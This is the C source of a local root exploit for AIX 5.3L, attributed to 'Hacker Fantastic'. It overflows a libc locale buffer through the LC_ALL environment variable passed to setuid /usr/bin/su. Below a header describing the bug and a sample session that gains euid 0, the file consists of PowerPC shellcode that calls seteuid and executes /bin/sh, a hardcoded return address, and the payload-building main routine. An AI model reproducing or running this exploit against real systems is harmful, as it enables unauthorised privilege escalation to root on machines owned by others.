/*AIX 5.3L libc locale environment handling local root exploit
* ============================================================
* The AIX5.3L (and possibly others) libc is vulnerable to multiple
* buffer overflow issues in the handling of locale environment 
* variables. This allows for exploitation of any setuid root binary
* that makes use of functions such as setlocale() which do not 
* perform bounds checking when handling LC_* environment variables.
* An attacker can leverage this issue to obtain root privileges on
* an impacted AIX system. This exploit makes use of the "/usr/bin/su"
* binary to trigger the overflow through LC_ALL and obtain root.
*
* e.g
* bash-4.4$ oslevel;uname -a;ls -al `which su`
* 5.3.0.0
* AIX aix53l 3 5 000772244C00
* -r-sr-xr-x   1 root     security      28598 May 06 2006  /usr/bin/su
* bash-4.4$ gcc aix53l-libc.c -o aix53l-libc
* bash-4.4$ ./aix53l-libc
* [ AIX5.3L libc locale environment handling local root exploit
* # id
* uid=202(user) gid=1(staff) euid=0(root)
*
* -- Hacker Fantastic 
* (https://hacker.house)
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <memory.h>
#include <string.h>

char shellcode[]="\x7f\xff\xfb\x78" /* mr      r31,r31 (nop)          */
		 "\x7f\xff\xfb\x78" /* mr      r31,r31 (nop)          */
		 "\x7f\xff\xfb\x78" /* mr      r31,r31 (nop)          */
		 "\x7f\xff\xfb\x78" /* mr      r31,r31 (nop)          */
		 "\x7f\xff\xfb\x78" /* mr      r31,r31 (nop)          */
		 "\x7c\x84\x22\x78" /* xor r4,r4,r4                   */
		 "\x7e\x94\xa2\x79" /* xor.    r20,r20,r20            */
		 "\x40\x82\xff\xfd" /* bnel    (seteuidcode)          */
		 "\x7e\xa8\x02\xa6" /* mflr    r21                    */
		 "\x3a\xb5\x01\x40" /* cal     r21,0x140(r21)         */
		 "\x88\x55\xfe\xe0" /* lbz     r2,-288(r21)           */
		 "\x7e\x83\xa3\x78" /* mr      r3,r20                 */
		 "\x3a\xd5\xfe\xe4" /* cal     r22,-284(r21)          */
		 "\x7e\xc8\x03\xa6" /* mtlr    r22                    */
		 "\x4c\xc6\x33\x42" /* crorc   cr6,cr6,cr6            */
		 "\x44\xff\xff\x02" /* svca                           */
		 "\xaa\x06\xff\xff" /* 0xaa = seteuid 0x06 = execve   */
		 "\x38\x75\xff\x04" /* cal     r3,-252(r21)           */	
		 "\x38\x95\xff\x0c" /* cal     r4,-244(r21)           */
		 "\x7e\x85\xa3\x78" /* mr      r5,r20                 */
		 "\x90\x75\xff\x0c" /* st      r3,-244(r21)           */
		 "\x92\x95\xff\x10" /* st      r20,-240(r21)          */
		 "\x88\x55\xfe\xe1" /* lbz     r2,-287(r21)           */
		 "\x9a\x95\xff\x0b" /* stb     r20,-245(r21)          */
		 "\x4b\xff\xff\xd8" /* bl      (setreuidcode+32)      */	
		 "/bin/sh";

int main(int argc, char* argv[]){
	int i = 0;
	int bufsize = 2048;
	char* buffer = malloc(bufsize);
	if(!buffer)
		exit(0);
	char* envp[] = {buffer,NULL};
	char* argvp[] = {"su","/",NULL};
	printf("[ AIX5.3L libc locale environment handling local root exploit\n");
	memset(buffer,0,1024);
	strcpy(buffer,"LC_ALL=");
	for(i = 0;i < 334;i++){
		strcat(buffer,"A");
	}
	strcat(buffer,"\x2f\xf2\x2f\x04"); // 0x2ff22f04
	strcat(buffer,"AA");
	strcat(buffer,shellcode);
	execve("/usr/bin/su",argvp,envp);
}